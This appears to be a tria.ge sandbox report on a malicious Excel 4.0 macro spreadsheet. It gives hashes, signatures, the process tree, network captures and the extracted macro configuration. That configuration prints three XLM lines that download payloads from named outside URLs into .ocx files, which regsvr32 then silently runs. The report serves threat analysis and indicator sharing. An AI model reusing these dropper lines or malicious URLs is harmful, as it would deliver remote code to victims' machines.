Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

8

486011410d...42.xls

windows7-x64

10

486011410d...42.xls

windows10-2004-x64

10

Analysis

  • max time kernel
    118s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    20/11/2024, 22:55 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    486011410d80fc17aaa070ed2bbb0367419b79fb77da01d503f84fad4dffe342.xls

  • Size

    46KB

  • MD5

    8b65052cfc75035cea9fa038e3da2a54

  • SHA1

    620871171c230d38bc48614992f4eb7366f41287

  • SHA256

    486011410d80fc17aaa070ed2bbb0367419b79fb77da01d503f84fad4dffe342

  • SHA512

    1e1e8ffb6fd4705da82eeff11f37216a11d2ee903f9174de8836fe0b1a7da7bb8d920cb18d1622d58909eee517d627172b26cc1a09837ce80b21140a31448f97

  • SSDEEP

    768:pDMPKpb8rGYrMPe3q7Q0XV5xtezE8vpI8UM+VQTUs77quK7KtGu6w:pYKpb8rGYrMPe3q7Q0XV5xtezE8vG8UW

Score
10/10
discovery

Malware Config

Extracted

Language
xlm4.0
Source
1
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "https://zktecovn.com/wp-admin/xxfnYY4zwOpFOgu3g1t/", "..\wdusx1.ocx")
2
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://zacharywythe.com/pb_index_bak/SkEGB2c/", "..\wdusx2.ocx")
3
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://zonainformatica.es/aspnet_client/pVcppgi00Dk/", "..\wdusx3.ocx")
URLs
xlm40.dropper

https://zktecovn.com/wp-admin/xxfnYY4zwOpFOgu3g1t/
xlm40.dropper

http://zacharywythe.com/pb_index_bak/SkEGB2c/
xlm40.dropper

http://zonainformatica.es/aspnet_client/pVcppgi00Dk/

Signatures

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\486011410d80fc17aaa070ed2bbb0367419b79fb77da01d503f84fad4dffe342.xls
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2112
    • C:\Windows\SysWOW64\regsvr32.exe
      C:\Windows\System32\regsvr32.exe /S ..\wdusx1.ocx
      2⤵
      • Process spawned unexpected child process
      • System Location Discovery: System Language Discovery
      PID:2472
    • C:\Windows\SysWOW64\regsvr32.exe
      C:\Windows\System32\regsvr32.exe /S ..\wdusx2.ocx
      2⤵
      • Process spawned unexpected child process
      • System Location Discovery: System Language Discovery
      PID:2344
    • C:\Windows\SysWOW64\regsvr32.exe
      C:\Windows\System32\regsvr32.exe /S ..\wdusx3.ocx
      2⤵
      • Process spawned unexpected child process
      • System Location Discovery: System Language Discovery
      PID:2608

Network

  • flag-us
    DNS
    zktecovn.com
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    zktecovn.com
    IN A
    Response
    zktecovn.com
    IN A
    103.110.87.36
  • flag-vn
    GET
    https://zktecovn.com/wp-admin/xxfnYY4zwOpFOgu3g1t/
    EXCEL.EXE
    Remote address:
    103.110.87.36:443
    Request
    GET /wp-admin/xxfnYY4zwOpFOgu3g1t/ HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: zktecovn.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 404 Not Found
    expires: Wed, 11 Jan 1984 05:00:00 GMT
    cache-control: no-cache, must-revalidate, max-age=0
    content-type: text/html; charset=UTF-8
    link: <https://zktecovn.com/wp-json/>; rel="https://api.w.org/"
    content-encoding: gzip
    vary: Accept-Encoding
    transfer-encoding: chunked
    date: Wed, 20 Nov 2024 22:55:44 GMT
    server: LiteSpeed
    x-xss-protection: 1;mode=block
    x-frame-options: SAMEORIGIN
    referrer-policy: strict-origin-when-cross-origin
    x-content-type-options: nosniff
    x-powered-by: WPTangTocOLS
    permissions-policy: accelerometer=(), camera=(), geolocation=(), gyroscope=(), magnetometer=(), microphone=(), payment=(), usb=()
    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
    connection: Keep-Alive
  • flag-us
    DNS
    r11.o.lencr.org
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    r11.o.lencr.org
    IN A
    Response
    r11.o.lencr.org
    IN CNAME
    o.lencr.edgesuite.net
    o.lencr.edgesuite.net
    IN CNAME
    a1887.dscq.akamai.net
    a1887.dscq.akamai.net
    IN A
    88.221.134.137
    a1887.dscq.akamai.net
    IN A
    88.221.134.89
    a1887.dscq.akamai.net
    IN A
    88.221.135.105
    a1887.dscq.akamai.net
    IN A
    88.221.135.115
  • flag-gb
    GET
    http://r11.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgM8bmk8NiM6sFCZmd6yiQNRHQ%3D%3D
    EXCEL.EXE
    Remote address:
    88.221.134.137:80
    Request
    GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgM8bmk8NiM6sFCZmd6yiQNRHQ%3D%3D HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/6.1
    Host: r11.o.lencr.org
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Content-Type: application/ocsp-response
    Content-Length: 504
    ETag: "3014725AE5ECD24A3DC6B0885C5B415FD9688144DB225B8419BD22C743668052"
    Last-Modified: Mon, 18 Nov 2024 21:33:00 UTC
    Cache-Control: public, no-transform, must-revalidate, max-age=21600
    Expires: Thu, 21 Nov 2024 04:55:43 GMT
    Date: Wed, 20 Nov 2024 22:55:43 GMT
    Connection: keep-alive
  • flag-us
    DNS
    zacharywythe.com
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    zacharywythe.com
    IN A
    Response
    zacharywythe.com
    IN A
    192.250.237.63
  • flag-ca
    GET
    http://zacharywythe.com/pb_index_bak/SkEGB2c/
    EXCEL.EXE
    Remote address:
    192.250.237.63:80
    Request
    GET /pb_index_bak/SkEGB2c/ HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: zacharywythe.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 403 Forbidden
    Connection: Keep-Alive
    Keep-Alive: timeout=5, max=100
    content-type: text/html
    content-length: 20
    content-encoding: gzip
    vary: Accept-Encoding,User-Agent
    date: Wed, 20 Nov 2024 22:55:45 GMT
    server: LiteSpeed
  • flag-us
    DNS
    zonainformatica.es
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    zonainformatica.es
    IN A
    Response
    zonainformatica.es
    IN A
    82.98.170.50
  • flag-es
    GET
    http://zonainformatica.es/aspnet_client/pVcppgi00Dk/
    EXCEL.EXE
    Remote address:
    82.98.170.50:80
    Request
    GET /aspnet_client/pVcppgi00Dk/ HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: zonainformatica.es
    Connection: Keep-Alive
    Response
    HTTP/1.1 301 Moved Permanently
    Content-Type: text/html; charset=UTF-8
    Location: https://zonainformatica.es/aspnet_client/pVcppgi00Dk/
    Server: Microsoft-IIS/10.0
    X-Powered-By: ASP.NET
    Date: Wed, 20 Nov 2024 22:55:44 GMT
    Content-Length: 176
  • flag-es
    GET
    https://zonainformatica.es/aspnet_client/pVcppgi00Dk/
    EXCEL.EXE
    Remote address:
    82.98.170.50:443
    Request
    GET /aspnet_client/pVcppgi00Dk/ HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Connection: Keep-Alive
    Host: zonainformatica.es
    Response
    HTTP/1.1 404 Not Found
    Content-Type: text/html
    Server: Microsoft-IIS/10.0
    X-Powered-By: ASP.NET
    Date: Wed, 20 Nov 2024 22:55:44 GMT
    Content-Length: 1245
  • flag-us
    DNS
    www.microsoft.com
    Remote address:
    8.8.8.8:53
    Request
    www.microsoft.com
    IN A
    Response
    www.microsoft.com
    IN CNAME
    www.microsoft.com-c-3.edgekey.net
    www.microsoft.com-c-3.edgekey.net
    IN CNAME
    www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
    www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
    IN CNAME
    e13678.dscb.akamaiedge.net
    e13678.dscb.akamaiedge.net
    IN A
    95.100.245.144
  • flag-gb
    GET
    http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl
    Remote address:
    95.100.245.144:80
    Request
    GET /pkiops/crl/MicCodSigPCA2011_2011-07-08.crl HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    If-Modified-Since: Mon, 03 Jun 2024 21:25:24 GMT
    User-Agent: Microsoft-CryptoAPI/6.1
    Host: www.microsoft.com
    Response
    HTTP/1.1 200 OK
    Content-Length: 1078
    Content-Type: application/octet-stream
    Content-MD5: PjrtHAukbJio72s77Ag5mA==
    Last-Modified: Thu, 31 Oct 2024 23:26:09 GMT
    ETag: 0x8DCFA0366D6C4CA
    x-ms-request-id: d8b251ae-001e-0067-1bed-2b4716000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Wed, 20 Nov 2024 22:56:13 GMT
    Connection: keep-alive
    TLS_version: UNKNOWN
    ms-cv: CASMicrosoftCV2c3f7533.0
    ms-cv-esi: CASMicrosoftCV2c3f7533.0
    X-RTag: RT
  • flag-us
    DNS
    crl.microsoft.com
    Remote address:
    8.8.8.8:53
    Request
    crl.microsoft.com
    IN A
    Response
    crl.microsoft.com
    IN CNAME
    crl.www.ms.akadns.net
    crl.www.ms.akadns.net
    IN CNAME
    a1363.dscg.akamai.net
    a1363.dscg.akamai.net
    IN A
    88.221.134.83
    a1363.dscg.akamai.net
    IN A
    88.221.134.146
  • flag-gb
    GET
    http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
    Remote address:
    88.221.134.83:80
    Request
    GET /pki/crl/products/MicRooCerAut2011_2011_03_22.crl HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    If-Modified-Since: Thu, 11 Jul 2024 01:45:51 GMT
    User-Agent: Microsoft-CryptoAPI/6.1
    Host: crl.microsoft.com
    Response
    HTTP/1.1 200 OK
    Content-Length: 1036
    Content-Type: application/octet-stream
    Content-MD5: 8M9bF5Tsp81z+cAg2quO8g==
    Last-Modified: Thu, 26 Sep 2024 02:21:11 GMT
    ETag: 0x8DCDDD1E3AF2C76
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 37b0a847-001e-003a-4dc7-0f4d92000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Wed, 20 Nov 2024 22:56:14 GMT
    Connection: keep-alive
  • 103.110.87.36:443
    https://zktecovn.com/wp-admin/xxfnYY4zwOpFOgu3g1t/
    tls, http
    EXCEL.EXE
    1.5kB
     23.6kB
     17
    24

    HTTP Request

    GET https://zktecovn.com/wp-admin/xxfnYY4zwOpFOgu3g1t/

    HTTP Response

    404
  • 88.221.134.137:80
    http://r11.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgM8bmk8NiM6sFCZmd6yiQNRHQ%3D%3D
    http
    EXCEL.EXE
    521 B
     2.0kB
     6
    4

    HTTP Request

    GET http://r11.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgM8bmk8NiM6sFCZmd6yiQNRHQ%3D%3D

    HTTP Response

    200
  • 192.250.237.63:80
    http://zacharywythe.com/pb_index_bak/SkEGB2c/
    http
    EXCEL.EXE
    658 B
     513 B
     7
    6

    HTTP Request

    GET http://zacharywythe.com/pb_index_bak/SkEGB2c/

    HTTP Response

    403
  • 82.98.170.50:80
    http://zonainformatica.es/aspnet_client/pVcppgi00Dk/
    http
    EXCEL.EXE
    619 B
     556 B
     6
    3

    HTTP Request

    GET http://zonainformatica.es/aspnet_client/pVcppgi00Dk/

    HTTP Response

    301
  • 82.98.170.50:443
    https://zonainformatica.es/aspnet_client/pVcppgi00Dk/
    tls, http
    EXCEL.EXE
    1.1kB
     4.6kB
     9
    8

    HTTP Request

    GET https://zonainformatica.es/aspnet_client/pVcppgi00Dk/

    HTTP Response

    404
  • 95.100.245.144:80
    http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl
    http
    393 B
     1.7kB
     4
    4

    HTTP Request

    GET http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl

    HTTP Response

    200
  • 88.221.134.83:80
    http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
    http
    399 B
     1.7kB
     4
    4

    HTTP Request

    GET http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl

    HTTP Response

    200
  • 8.8.8.8:53
    zktecovn.com
    dns
    EXCEL.EXE
    58 B
     74 B
     1
    1

    DNS Request

    zktecovn.com

    DNS Response

    103.110.87.36

  • 8.8.8.8:53
    r11.o.lencr.org
    dns
    EXCEL.EXE
    61 B
     192 B
     1
    1

    DNS Request

    r11.o.lencr.org

    DNS Response

    88.221.134.137
    88.221.134.89
    88.221.135.105
    88.221.135.115

  • 8.8.8.8:53
    zacharywythe.com
    dns
    EXCEL.EXE
    62 B
     78 B
     1
    1

    DNS Request

    zacharywythe.com

    DNS Response

    192.250.237.63

  • 8.8.8.8:53
    zonainformatica.es
    dns
    EXCEL.EXE
    64 B
     80 B
     1
    1

    DNS Request

    zonainformatica.es

    DNS Response

    82.98.170.50

  • 8.8.8.8:53
    www.microsoft.com
    dns
    63 B
     230 B
     1
    1

    DNS Request

    www.microsoft.com

    DNS Response

    95.100.245.144

  • 8.8.8.8:53
    crl.microsoft.com
    dns
    63 B
     162 B
     1
    1

    DNS Request

    crl.microsoft.com

    DNS Response

    88.221.134.83
    88.221.134.146

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2112-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2112-1-0x000000007275D000-0x0000000072768000-memory.dmp

    Filesize

    44KB

    Download

  • memory/2112-16-0x000000007275D000-0x0000000072768000-memory.dmp

    Filesize

    44KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.